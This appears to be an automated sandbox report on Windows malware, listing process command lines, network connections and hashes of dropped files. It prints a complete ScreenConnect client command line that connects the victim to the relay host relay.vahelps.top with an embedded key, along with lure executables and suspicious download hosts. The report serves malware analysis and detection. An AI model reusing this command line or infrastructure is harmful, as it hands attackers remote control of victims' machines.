C:\Windows\syswow64\MsiExec.exe -Embedding 501C26F1CE30D7B554A79751F99BB4EE
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 61A8950CFA1EEDB446376A3DD14F3157 E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FLASHUSDT"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "b12c0afe-1dfe-41b1-841a-d2b5a593a6d7" "User"
C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe
"C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8F1D51CFCAEC926228398F458DDE36A1 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8068.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_242385015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F1388A9BCDC3D64ED9DD91AC684C718E
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff65c066a68,0x7ff65c066a74,0x7ff65c066a80
C:\Users\Admin\AppData\Local\Temp\a\main.exe
"C:\Users\Admin\AppData\Local\Temp\a\main.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff65c066a68,0x7ff65c066a74,0x7ff65c066a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ad4e6a68,0x7ff6ad4e6a74,0x7ff6ad4e6a80
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| HK | 189.1.225.221:880 | 189.1.225.221 | tcp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| IE | 20.190.159.73:443 | tcp | |
| US | 52.217.231.129:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 52.252.28.242:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 52.252.28.242:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 52.252.28.242:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 52.252.28.242:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 52.252.28.242:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 52.252.28.242:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 199.232.214.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| CN | 113.44.48.28:80 | tcp | |
| US | 8.8.8.8:53 | bestsoftwaredownloads.com | udp |
| NL | 45.141.59.161:443 | bestsoftwaredownloads.com | tcp |
| CN | 113.44.48.28:80 | tcp | |
| NL | 45.141.59.161:443 | bestsoftwaredownloads.com | tcp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| NL | 45.141.59.161:443 | bestsoftwaredownloads.com | tcp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| GB | 104.86.110.128:443 | www.bing.com | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| NL | 45.141.59.161:443 | bestsoftwaredownloads.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | udp | |
| NL | 149.154.167.99:443 | tcp | |
| US | 8.8.8.8:53 | webdisk.lodrat.org | udp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 144.76.181.182:443 | azsolver.com | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| GB | 104.86.110.200:80 | e6.o.lencr.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| GB | 172.217.16.234:443 | ogads-pa.googleapis.com | udp |
| GB | 172.217.16.234:443 | ogads-pa.googleapis.com | tcp |
| GB | 142.250.179.238:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.179.238:443 | clients2.google.com | tcp |
| GB | 142.250.200.46:443 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| GB | 142.250.200.46:443 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | data-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.242.104:443 | data-edge.smartscreen.microsoft.com | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| GB | 104.91.71.142:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| DE | 88.99.124.230:443 | webdisk.lodrat.org | tcp |
| US | 8.8.8.8:53 | relay.vahelps.top | udp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
Files
memory/4900-0-0x00007FFE85CB3000-0x00007FFE85CB5000-memory.dmp
memory/4900-1-0x0000000000660000-0x0000000000668000-memory.dmp
memory/4900-2-0x00007FFE85CB0000-0x00007FFE86772000-memory.dmp
memory/4900-3-0x00007FFE85CB3000-0x00007FFE85CB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe
| MD5 | 97688d1dfb46caa2d259c14066a6b0b1 |
| SHA1 | 3305e32ca0004e82f9199bdf02115e38be592c23 |
| SHA256 | 5cd644eccdd1f056b6cf779f7f84cfa66c34f2f58b85f44799db87ef9852526a |
| SHA512 | 6421d8eb6ce0c8254d3c179343d49631926f45361f457da2600873d2815904b71def7e8288b1138b0c809d582116a9894dddad99cd29e9f789ecb8ae5cdc2bff |
memory/4900-13-0x00007FFE85CB0000-0x00007FFE86772000-memory.dmp
memory/4788-16-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-18-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-17-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-28-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-27-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-26-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-25-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-24-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-23-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
memory/4788-22-0x000001D3232F0000-0x000001D3232F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
| MD5 | cde00f5b60c05b3b3a47c74fedb066da |
| SHA1 | 81fcbfd9c46e969dd4b4538c4712f05088b9390a |
| SHA256 | f93d6ef0b54b5e882d1420339c3083315cc2104ea73c95fea0dca9594913e282 |
| SHA512 | c1347aa9d5b549ec9fe0147af2b2b6fe89cbd0f490e8258b9994cde105c2e697fe97f19ffd10dd7d6d1b3ba2132713eca4f2165e19d56ac298fd9c796ace215b |
memory/1208-40-0x0000000001B90000-0x0000000001B98000-memory.dmp
memory/1208-41-0x0000000005EF0000-0x00000000061E0000-memory.dmp
memory/1208-42-0x0000000005BF0000-0x0000000005C7C000-memory.dmp
memory/1208-43-0x0000000005B90000-0x0000000005BB2000-memory.dmp
memory/1208-44-0x0000000005C80000-0x0000000005E2A000-memory.dmp
memory/1208-45-0x0000000006790000-0x0000000006D36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi
| MD5 | 8cd86deb5832bbe7d1f1694344ed3630 |
| SHA1 | e268e4254203346e1a55b5ca65b6d7e19ec2c525 |
| SHA256 | 7814365ddd6d22a373e4279d42816bcf8b53bf146c2e5ba4a334003da9a47a82 |
| SHA512 | 7794b5203b94d4688c75cd7bdaec345d50e39e48712bef37d85124dd280e0659e9bf22dd063f24aec0d248c5de96a8647127ecfd1de4c5436dbade57c5d36cb1 |
C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp
| MD5 | 8a8767f589ea2f2c7496b63d8ccc2552 |
| SHA1 | cc5de8dd18e7117d8f2520a51edb1d165cae64b0 |
| SHA256 | 0918d8ab2237368a5cec8ce99261fb07a1a1beeda20464c0f91af0fe3349636b |
| SHA512 | 518231213ca955acdf37b4501fde9c5b15806d4fc166950eb8706e8d3943947cf85324faee806d7df828485597eceffcfa05ca1a5d8ab1bd51ed12df963a1fe4 |
memory/252-67-0x0000000004B70000-0x0000000004B9E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp-\Microsoft.Deployment.WindowsInstaller.dll
| MD5 | 5ef88919012e4a3d8a1e2955dc8c8d81 |
| SHA1 | c0cfb830b8f1d990e3836e0bcc786e7972c9ed62 |
| SHA256 | 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d |
| SHA512 | 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684 |
memory/252-71-0x0000000004BB0000-0x0000000004BBA000-memory.dmp
memory/252-75-0x0000000004C60000-0x0000000004CEC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp-\ScreenConnect.Windows.dll
| MD5 | 9ad3964ba3ad24c42c567e47f88c82b2 |
| SHA1 | 6b4b581fc4e3ecb91b24ec601daa0594106bcc5d |
| SHA256 | 84a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0 |
| SHA512 | ce557a89c0fe6de59046116c1e262a36bbc3d561a91e44dcda022bef72cb75742c8b01bedcc5b9b999e07d8de1f94c665dd85d277e981b27b6bfebeaf9e58097 |
memory/252-79-0x0000000004EA0000-0x000000000504A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp-\ScreenConnect.Core.dll
| MD5 | 14e7489ffebbb5a2ea500f796d881ad9 |
| SHA1 | 0323ee0e1faa4aa0e33fb6c6147290aa71637ebd |
| SHA256 | a2e9752de49d18e885cbd61b29905983d44b4bc0379a244bfabdaa3188c01f0a |
| SHA512 | 2110113240b7d803d8271139e0a2439dbc86ae8719ecd8b132bbda2520f22dc3f169598c8e966ac9c0a40e617219cb8fe8aac674904f6a1ae92d4ac1e20627cd |
C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp-\ScreenConnect.InstallerActions.dll
| MD5 | 73a24164d8408254b77f3a2c57a22ab4 |
| SHA1 | ea0215721f66a93d67019d11c4e588a547cc2ad6 |
| SHA256 | d727a640723d192aa3ece213a173381682041cb28d8bd71781524dbae3ddbf62 |
| SHA512 | 650d4320d9246aaecd596ac8b540bf7612ec7a8f60ecaa6e9c27b547b751386222ab926d0c915698d0bb20556475da507895981c072852804f0b42fdda02b844 |
C:\Windows\Installer\MSIBD74.tmp
| MD5 | ba84dd4e0c1408828ccc1de09f585eda |
| SHA1 | e8e10065d479f8f591b9885ea8487bc673301298 |
| SHA256 | 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852 |
| SHA512 | 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290 |
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
| MD5 | 75b21d04c69128a7230a0998086b61aa |
| SHA1 | 244bd68a722cfe41d1f515f5e40c3742be2b3d1d |
| SHA256 | f1b5c000794f046259121c63ed37f9eff0cfe1258588eca6fd85e16d3922767e |
| SHA512 | 8d51b2cd5f21c211eb8fea4b69dc9f91dffa7bb004d9780c701de35eac616e02ca30ef3882d73412f7eab1211c5aa908338f3fa10fdf05b110f62b8ecd9d24c2 |
memory/3116-134-0x0000000002080000-0x0000000002098000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.dll
| MD5 | 5db908c12d6e768081bced0e165e36f8 |
| SHA1 | f2d3160f15cfd0989091249a61132a369e44dea4 |
| SHA256 | fd5818dcdf5fc76316b8f7f96630ec66bb1cb5b5a8127cf300e5842f2c74ffca |
| SHA512 | 8400486cadb7c07c08338d8876bc14083b6f7de8a8237f4fe866f4659139acc0b587eb89289d281106e5baf70187b3b5e86502a2e340113258f03994d959328d |
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\app.config
| MD5 | b155ef2eb7c49f5d401d9ac84f781f34 |
| SHA1 | 7de31144110631b5e80e73f01f247c1625164b78 |
| SHA256 | 9aad8e47d0105531e07b1cf65719ae49e080e686c2e1e220e9efc009c411bf92 |
| SHA512 | 95b7afc2b676fa23375de3e1e0ea44325539b754e53d63048381015fabad6881fbb2e729d8a3c078fd38a6024d3a079d8466d7435c9f5bc39ae5df4c2722bc2d |
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\system.config
| MD5 | 07a92ed722d2d0152bd8d8e2aaec0ad0 |
| SHA1 | 025133f5dfe9615722a67eed5785c84fc741f1ef |
| SHA256 | f89beb98979ae11ea99f9de1ccc525c8c50d8e4337a58beab030b0268437f4dc |
| SHA512 | 83334f752a13d0bd447e0784712448b0669f3eb2ef39fe65fda0c4f404783a01fa3b891ce77ea13d857c3dd048d5767f756eb1a91bd1c7e7403b81e713b5e8ad |
memory/3116-145-0x0000000004810000-0x0000000004860000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.Client.dll
| MD5 | 3724f06f3422f4e42b41e23acb39b152 |
| SHA1 | 1220987627782d3c3397d4abf01ac3777999e01c |
| SHA256 | ea0a545f40ff491d02172228c1a39ae68344c4340a6094486a47be746952e64f |
| SHA512 | 509d9a32179a700ad76471b4cd094b8eb6d5d4ae7ad15b20fd76c482ed6d68f44693fc36bcb3999da9346ae9e43375cd8fe02b61edeabe4e78c4e2e44bf71d42 |
memory/3116-149-0x0000000004A10000-0x0000000004A46000-memory.dmp
memory/3116-150-0x0000000004AF0000-0x0000000004B82000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsCredentialProvider.dll
| MD5 | be74ab7a848a2450a06de33d3026f59e |
| SHA1 | 21568dcb44df019f9faf049d6676a829323c601e |
| SHA256 | 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d |
| SHA512 | 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc |
memory/3116-152-0x0000000004A50000-0x0000000004A91000-memory.dmp
memory/3116-154-0x0000000004CE0000-0x0000000004DB2000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsAuthenticationPackage.dll
| MD5 | 5adcb5ae1a1690be69fd22bdf3c2db60 |
| SHA1 | 09a802b06a4387b0f13bf2cda84f53ca5bdc3785 |
| SHA256 | a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5 |
| SHA512 | 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73 |
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\Client.resources
| MD5 | 5cd580b22da0c33ec6730b10a6c74932 |
| SHA1 | 0b6bded7936178d80841b289769c6ff0c8eead2d |
| SHA256 | de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c |
